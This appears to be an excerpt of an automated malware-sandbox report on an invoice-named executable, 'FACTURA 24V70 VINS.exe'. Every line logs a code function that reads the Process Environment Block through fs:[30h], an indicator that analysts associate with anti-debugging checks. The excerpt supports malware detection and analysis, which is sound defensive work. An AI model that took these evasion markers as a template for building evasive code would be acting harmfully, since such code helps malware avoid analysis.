Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175C073 mov eax, dword ptr fs:[00000030h]	3_2_0175C073
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01732050 mov eax, dword ptr fs:[00000030h]	3_2_01732050
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B6050 mov eax, dword ptr fs:[00000030h]	3_2_017B6050
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017C6030 mov eax, dword ptr fs:[00000030h]	3_2_017C6030
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0172A020 mov eax, dword ptr fs:[00000030h]	3_2_0172A020
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0172C020 mov eax, dword ptr fs:[00000030h]	3_2_0172C020
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0174E016 mov eax, dword ptr fs:[00000030h]	3_2_0174E016
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0174E016 mov eax, dword ptr fs:[00000030h]	3_2_0174E016
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0174E016 mov eax, dword ptr fs:[00000030h]	3_2_0174E016
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0174E016 mov eax, dword ptr fs:[00000030h]	3_2_0174E016
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B4000 mov ecx, dword ptr fs:[00000030h]	3_2_017B4000
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017D2000 mov eax, dword ptr fs:[00000030h]	3_2_017D2000
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017D2000 mov eax, dword ptr fs:[00000030h]	3_2_017D2000
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017D2000 mov eax, dword ptr fs:[00000030h]	3_2_017D2000
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017D2000 mov eax, dword ptr fs:[00000030h]	3_2_017D2000
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017D2000 mov eax, dword ptr fs:[00000030h]	3_2_017D2000
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017D2000 mov eax, dword ptr fs:[00000030h]	3_2_017D2000
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017D2000 mov eax, dword ptr fs:[00000030h]	3_2_017D2000
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017D2000 mov eax, dword ptr fs:[00000030h]	3_2_017D2000
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0172C0F0 mov eax, dword ptr fs:[00000030h]	3_2_0172C0F0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017720F0 mov ecx, dword ptr fs:[00000030h]	3_2_017720F0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0172A0E3 mov ecx, dword ptr fs:[00000030h]	3_2_0172A0E3
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017380E9 mov eax, dword ptr fs:[00000030h]	3_2_017380E9
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B60E0 mov eax, dword ptr fs:[00000030h]	3_2_017B60E0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B20DE mov eax, dword ptr fs:[00000030h]	3_2_017B20DE
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F60B8 mov eax, dword ptr fs:[00000030h]	3_2_017F60B8
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017F60B8 mov ecx, dword ptr fs:[00000030h]	3_2_017F60B8
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017280A0 mov eax, dword ptr fs:[00000030h]	3_2_017280A0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017C80A8 mov eax, dword ptr fs:[00000030h]	3_2_017C80A8
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0173208A mov eax, dword ptr fs:[00000030h]	3_2_0173208A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017D437C mov eax, dword ptr fs:[00000030h]	3_2_017D437C
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B035C mov eax, dword ptr fs:[00000030h]	3_2_017B035C
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B035C mov eax, dword ptr fs:[00000030h]	3_2_017B035C
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B035C mov eax, dword ptr fs:[00000030h]	3_2_017B035C
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B035C mov ecx, dword ptr fs:[00000030h]	3_2_017B035C
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B035C mov eax, dword ptr fs:[00000030h]	3_2_017B035C
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B035C mov eax, dword ptr fs:[00000030h]	3_2_017B035C
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017FA352 mov eax, dword ptr fs:[00000030h]	3_2_017FA352
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017D8350 mov ecx, dword ptr fs:[00000030h]	3_2_017D8350
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B2349 mov eax, dword ptr fs:[00000030h]	3_2_017B2349
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B2349 mov eax, dword ptr fs:[00000030h]	3_2_017B2349
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B2349 mov eax, dword ptr fs:[00000030h]	3_2_017B2349
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B2349 mov eax, dword ptr fs:[00000030h]	3_2_017B2349
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B2349 mov eax, dword ptr fs:[00000030h]	3_2_017B2349
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B2349 mov eax, dword ptr fs:[00000030h]	3_2_017B2349
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B2349 mov eax, dword ptr fs:[00000030h]	3_2_017B2349
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B2349 mov eax, dword ptr fs:[00000030h]	3_2_017B2349
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B2349 mov eax, dword ptr fs:[00000030h]	3_2_017B2349
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B2349 mov eax, dword ptr fs:[00000030h]	3_2_017B2349
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B2349 mov eax, dword ptr fs:[00000030h]	3_2_017B2349
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B2349 mov eax, dword ptr fs:[00000030h]	3_2_017B2349
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B2349 mov eax, dword ptr fs:[00000030h]	3_2_017B2349
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B2349 mov eax, dword ptr fs:[00000030h]	3_2_017B2349
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B2349 mov eax, dword ptr fs:[00000030h]	3_2_017B2349
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0172C310 mov ecx, dword ptr fs:[00000030h]	3_2_0172C310
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01750310 mov ecx, dword ptr fs:[00000030h]	3_2_01750310
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176A30B mov eax, dword ptr fs:[00000030h]	3_2_0176A30B
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176A30B mov eax, dword ptr fs:[00000030h]	3_2_0176A30B
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176A30B mov eax, dword ptr fs:[00000030h]	3_2_0176A30B
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0174E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0174E3F0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0174E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0174E3F0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0174E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0174E3F0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017663FF mov eax, dword ptr fs:[00000030h]	3_2_017663FF
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017403E9 mov eax, dword ptr fs:[00000030h]	3_2_017403E9
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017403E9 mov eax, dword ptr fs:[00000030h]	3_2_017403E9
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017403E9 mov eax, dword ptr fs:[00000030h]	3_2_017403E9
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017403E9 mov eax, dword ptr fs:[00000030h]	3_2_017403E9
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017403E9 mov eax, dword ptr fs:[00000030h]	3_2_017403E9
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017403E9 mov eax, dword ptr fs:[00000030h]	3_2_017403E9
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017403E9 mov eax, dword ptr fs:[00000030h]	3_2_017403E9
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017403E9 mov eax, dword ptr fs:[00000030h]	3_2_017403E9
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01808324 mov eax, dword ptr fs:[00000030h]	3_2_01808324
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01808324 mov ecx, dword ptr fs:[00000030h]	3_2_01808324
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01808324 mov eax, dword ptr fs:[00000030h]	3_2_01808324
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01808324 mov eax, dword ptr fs:[00000030h]	3_2_01808324
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DE3DB mov eax, dword ptr fs:[00000030h]	3_2_017DE3DB
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DE3DB mov eax, dword ptr fs:[00000030h]	3_2_017DE3DB
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DE3DB mov ecx, dword ptr fs:[00000030h]	3_2_017DE3DB
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DE3DB mov eax, dword ptr fs:[00000030h]	3_2_017DE3DB
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017D43D4 mov eax, dword ptr fs:[00000030h]	3_2_017D43D4
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017D43D4 mov eax, dword ptr fs:[00000030h]	3_2_017D43D4
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017EC3CD mov eax, dword ptr fs:[00000030h]	3_2_017EC3CD
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0173A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0173A3C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0173A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0173A3C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0173A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0173A3C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0173A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0173A3C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0173A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0173A3C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0173A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0173A3C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017383C0 mov eax, dword ptr fs:[00000030h]	3_2_017383C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017383C0 mov eax, dword ptr fs:[00000030h]	3_2_017383C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017383C0 mov eax, dword ptr fs:[00000030h]	3_2_017383C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017383C0 mov eax, dword ptr fs:[00000030h]	3_2_017383C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B63C0 mov eax, dword ptr fs:[00000030h]	3_2_017B63C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0180634F mov eax, dword ptr fs:[00000030h]	3_2_0180634F
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01728397 mov eax, dword ptr fs:[00000030h]	3_2_01728397
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01728397 mov eax, dword ptr fs:[00000030h]	3_2_01728397
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01728397 mov eax, dword ptr fs:[00000030h]	3_2_01728397
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0172E388 mov eax, dword ptr fs:[00000030h]	3_2_0172E388
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0172E388 mov eax, dword ptr fs:[00000030h]	3_2_0172E388
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0172E388 mov eax, dword ptr fs:[00000030h]	3_2_0172E388
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175438F mov eax, dword ptr fs:[00000030h]	3_2_0175438F
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175438F mov eax, dword ptr fs:[00000030h]	3_2_0175438F
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E0274 mov eax, dword ptr fs:[00000030h]	3_2_017E0274
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E0274 mov eax, dword ptr fs:[00000030h]	3_2_017E0274
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E0274 mov eax, dword ptr fs:[00000030h]	3_2_017E0274
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E0274 mov eax, dword ptr fs:[00000030h]	3_2_017E0274
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E0274 mov eax, dword ptr fs:[00000030h]	3_2_017E0274
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E0274 mov eax, dword ptr fs:[00000030h]	3_2_017E0274
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E0274 mov eax, dword ptr fs:[00000030h]	3_2_017E0274
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E0274 mov eax, dword ptr fs:[00000030h]	3_2_017E0274
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E0274 mov eax, dword ptr fs:[00000030h]	3_2_017E0274
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E0274 mov eax, dword ptr fs:[00000030h]	3_2_017E0274
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E0274 mov eax, dword ptr fs:[00000030h]	3_2_017E0274
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E0274 mov eax, dword ptr fs:[00000030h]	3_2_017E0274
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01734260 mov eax, dword ptr fs:[00000030h]	3_2_01734260
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01734260 mov eax, dword ptr fs:[00000030h]	3_2_01734260
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01734260 mov eax, dword ptr fs:[00000030h]	3_2_01734260
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0172826B mov eax, dword ptr fs:[00000030h]	3_2_0172826B
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0172A250 mov eax, dword ptr fs:[00000030h]	3_2_0172A250
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01736259 mov eax, dword ptr fs:[00000030h]	3_2_01736259
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017EA250 mov eax, dword ptr fs:[00000030h]	3_2_017EA250
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017EA250 mov eax, dword ptr fs:[00000030h]	3_2_017EA250
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B8243 mov eax, dword ptr fs:[00000030h]	3_2_017B8243
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B8243 mov ecx, dword ptr fs:[00000030h]	3_2_017B8243
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0172823B mov eax, dword ptr fs:[00000030h]	3_2_0172823B
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_018062D6 mov eax, dword ptr fs:[00000030h]	3_2_018062D6
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017402E1 mov eax, dword ptr fs:[00000030h]	3_2_017402E1
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017402E1 mov eax, dword ptr fs:[00000030h]	3_2_017402E1
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017402E1 mov eax, dword ptr fs:[00000030h]	3_2_017402E1
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0173A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0173A2C3
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0173A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0173A2C3
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0173A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0173A2C3
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0173A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0173A2C3
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0173A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0173A2C3
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017C62A0 mov eax, dword ptr fs:[00000030h]	3_2_017C62A0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017C62A0 mov ecx, dword ptr fs:[00000030h]	3_2_017C62A0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017C62A0 mov eax, dword ptr fs:[00000030h]	3_2_017C62A0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017C62A0 mov eax, dword ptr fs:[00000030h]	3_2_017C62A0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017C62A0 mov eax, dword ptr fs:[00000030h]	3_2_017C62A0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017C62A0 mov eax, dword ptr fs:[00000030h]	3_2_017C62A0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0180625D mov eax, dword ptr fs:[00000030h]	3_2_0180625D
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176E284 mov eax, dword ptr fs:[00000030h]	3_2_0176E284
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176E284 mov eax, dword ptr fs:[00000030h]	3_2_0176E284
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B0283 mov eax, dword ptr fs:[00000030h]	3_2_017B0283
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B0283 mov eax, dword ptr fs:[00000030h]	3_2_017B0283
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B0283 mov eax, dword ptr fs:[00000030h]	3_2_017B0283
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176656A mov eax, dword ptr fs:[00000030h]	3_2_0176656A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176656A mov eax, dword ptr fs:[00000030h]	3_2_0176656A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176656A mov eax, dword ptr fs:[00000030h]	3_2_0176656A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01738550 mov eax, dword ptr fs:[00000030h]	3_2_01738550
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01738550 mov eax, dword ptr fs:[00000030h]	3_2_01738550
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01740535 mov eax, dword ptr fs:[00000030h]	3_2_01740535
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01740535 mov eax, dword ptr fs:[00000030h]	3_2_01740535
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01740535 mov eax, dword ptr fs:[00000030h]	3_2_01740535
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01740535 mov eax, dword ptr fs:[00000030h]	3_2_01740535
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01740535 mov eax, dword ptr fs:[00000030h]	3_2_01740535
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01740535 mov eax, dword ptr fs:[00000030h]	3_2_01740535
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175E53E mov eax, dword ptr fs:[00000030h]	3_2_0175E53E
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175E53E mov eax, dword ptr fs:[00000030h]	3_2_0175E53E
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175E53E mov eax, dword ptr fs:[00000030h]	3_2_0175E53E
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175E53E mov eax, dword ptr fs:[00000030h]	3_2_0175E53E
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175E53E mov eax, dword ptr fs:[00000030h]	3_2_0175E53E
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017C6500 mov eax, dword ptr fs:[00000030h]	3_2_017C6500
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01804500 mov eax, dword ptr fs:[00000030h]	3_2_01804500
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01804500 mov eax, dword ptr fs:[00000030h]	3_2_01804500
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01804500 mov eax, dword ptr fs:[00000030h]	3_2_01804500
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01804500 mov eax, dword ptr fs:[00000030h]	3_2_01804500
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01804500 mov eax, dword ptr fs:[00000030h]	3_2_01804500
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01804500 mov eax, dword ptr fs:[00000030h]	3_2_01804500
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01804500 mov eax, dword ptr fs:[00000030h]	3_2_01804500
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0175E5E7
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0175E5E7
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0175E5E7
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0175E5E7
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0175E5E7
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0175E5E7
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0175E5E7
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0175E5E7
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017325E0 mov eax, dword ptr fs:[00000030h]	3_2_017325E0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176C5ED mov eax, dword ptr fs:[00000030h]	3_2_0176C5ED
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176C5ED mov eax, dword ptr fs:[00000030h]	3_2_0176C5ED
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017365D0 mov eax, dword ptr fs:[00000030h]	3_2_017365D0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176A5D0 mov eax, dword ptr fs:[00000030h]	3_2_0176A5D0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176A5D0 mov eax, dword ptr fs:[00000030h]	3_2_0176A5D0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176E5CF mov eax, dword ptr fs:[00000030h]	3_2_0176E5CF
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176E5CF mov eax, dword ptr fs:[00000030h]	3_2_0176E5CF
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017545B1 mov eax, dword ptr fs:[00000030h]	3_2_017545B1
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017545B1 mov eax, dword ptr fs:[00000030h]	3_2_017545B1
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B05A7 mov eax, dword ptr fs:[00000030h]	3_2_017B05A7
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B05A7 mov eax, dword ptr fs:[00000030h]	3_2_017B05A7
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017B05A7 mov eax, dword ptr fs:[00000030h]	3_2_017B05A7
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176E59C mov eax, dword ptr fs:[00000030h]	3_2_0176E59C
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01732582 mov eax, dword ptr fs:[00000030h]	3_2_01732582
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01732582 mov ecx, dword ptr fs:[00000030h]	3_2_01732582
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01764588 mov eax, dword ptr fs:[00000030h]	3_2_01764588
